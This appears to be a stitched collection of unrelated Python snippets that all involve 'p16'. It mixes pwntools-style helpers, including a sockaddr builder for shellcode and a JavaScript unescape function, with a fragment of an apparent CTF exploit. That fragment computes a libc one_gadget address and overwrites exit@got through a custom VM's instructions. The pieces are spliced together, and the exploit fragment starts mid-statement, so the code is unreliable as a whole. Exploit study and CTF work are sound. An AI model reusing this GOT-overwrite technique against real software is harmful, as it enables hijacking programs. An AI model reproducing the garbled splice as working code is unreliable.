def vm3_asm(ins, operand_info, *args): result = '' result += p16(ins | operand_info) if len(args): for arg in args: result += arg # print result.encode('hex') return result
def sockaddr(host, port, network='ipv4'): """sockaddr(host, port, network = 'ipv4') -> (data, length, family) Creates a sockaddr_in or sockaddr_in6 memory buffer for use in shellcode. Arguments: host (str): Either an IP address or a hostname to be looked up. port (int): TCP/UDP port. network (str): Either 'ipv4' or 'ipv6'. Returns: A tuple containing the sockaddr buffer, length, and the address family. """ address_family = {'ipv4': socket.AF_INET, 'ipv6': socket.AF_INET6}[network] for family, _, _, _, ip in socket.getaddrinfo(host, None, address_family): ip = ip[0] if family == address_family: break else: log.error("Could not find %s address for %r" % (network, host)) info = socket.getaddrinfo(host, None, address_family) host = socket.inet_pton(address_family, ip) sockaddr = p16(address_family) sockaddr += pack( port, word_size=16, endianness='big') #Port should be big endian = network byte order length = 0 if network == 'ipv4': sockaddr += host length = 16 # Save ten bytes by skipping two 'push 0' else: sockaddr += p32(0xffffffff) # Save three bytes 'push -1' vs 'push 0' sockaddr += host length = len(sockaddr) + 4 # Save five bytes 'push 0' return (sockaddr, length, getattr(address_family, "name", address_family))
def p16(self, *a, **kw): return self.send(packing.p16(*a, **kw))
def js_unescape(s, **kwargs): r"""js_unescape(s, endian = None, **kwargs) -> bytes Unpack an escaped Unicode string from JavaScript's `escape()` function Arguments: s (str): Escaped string to unpack endian (str): Endianness with which to unpack the string ("little"/"big") Returns: A bytes representation of the unpacked data >>> js_unescape('%uadde%uefbe') b'\xde\xad\xbe\xef' >>> js_unescape('%udead%ubeef', endian='big') b'\xde\xad\xbe\xef' >>> js_unescape('abc%u4141123') b'a\x00b\x00c\x00AA1\x002\x003\x00' >>> data = b'abcdABCD1234!@#$\x00\x01\x02\x03\x80\x81\x82\x83' >>> js_unescape(js_escape(data)) == data True >>> js_unescape('%u4141%u42') Traceback (most recent call last): ValueError: Incomplete Unicode token: %u42 >>> js_unescape('%u4141%uwoot%4141') Traceback (most recent call last): ValueError: Failed to decode token: %uwoot >>> js_unescape('%u4141%E4%F6%FC%u4141') Traceback (most recent call last): NotImplementedError: Non-Unicode % tokens are not supported: %E4 >>> js_unescape('%u4141%zz%u4141') Traceback (most recent call last): ValueError: Bad % token: %zz """ s = packing._decode(s) res = [] p = 0 while p < len(s): if s[p] == '%': if s[p + 1] == "u": # Decode Unicode token e.g. %u4142 n = s[p + 2:p + 6] if len(n) < 4: raise ValueError('Incomplete Unicode token: %s' % s[p:]) try: n = int(n, 16) except ValueError: raise ValueError('Failed to decode token: %s' % s[p:p + 6]) res.append(packing.p16(n)) p += 6 elif s[p + 1] in string.hexdigits and s[p + 2] in string.hexdigits: # Decode Non-Unicode token e.g. %E4 raise NotImplementedError( 'Non-Unicode %% tokens are not supported: %s' % s[p:p + 3]) else: raise ValueError('Bad %% token: %s' % s[p:p + 3]) else: res.append(packing.p16(ord(s[p]))) p += 1 return b''.join(res)
def p16(self, address, data, *a, **kw): return self.write(address, packing.p16(data, *a, **kw)) def p8(self, address, data, *a, **kw): return self.write(address, packing.p8(data, *a, **kw))
def p16(self, address, data, *a, **kw): """Writes a 16-bit integer ``data`` to the specified ``address``""" return self.write(address, packing.p16(data, *a, **kw))
def arg_mem(num): return '\x22' + p16(num)
def arg_imm(value): return '\x21' + p16(value)
def arg_reg(num): return chr(32) + p16(num)
''' % (required, prev_))) # one_gadget write_value = libc_base + 0x4526a prev = 0 for i in xrange(8): cur = rand_solver(prev + i, write_value & 0xff) write_value >>= 8 code3 = '' code3 += vm3_asm(VM3_OPCODE_MOV, VM3_OP1_REG | VM3_OP1_WORD | VM3_OP2_IMM | VM3_OP2_WORD, p16(VM3_REG_DI), p16(0)) code3 += vm3_asm(VM3_OPCODE_RDRAND, 0) * (cur - prev) code3 += vm3_asm(VM3_OPCODE_MOV, VM3_OP1_REG | VM3_OP1_WORD | VM3_OP2_IMM | VM3_OP2_WORD, p16(VM3_REG_DS), p16(0)) # exit@got code3 += vm3_asm(VM3_OPCODE_MOV, VM3_OP1_REG | VM3_OP1_WORD | VM3_OP2_IMM | VM3_OP2_WORD, p16(VM3_REG_DI), p16(-(0x2050C0 - 0x205078 - i) & 0xffff)) code3 += vm3_asm(VM3_OPCODE_RDRAND, 0) code3 += vm3_asm(VM3_OPCODE_HLT, 0) execute_vm3(code3) prev = cur + 1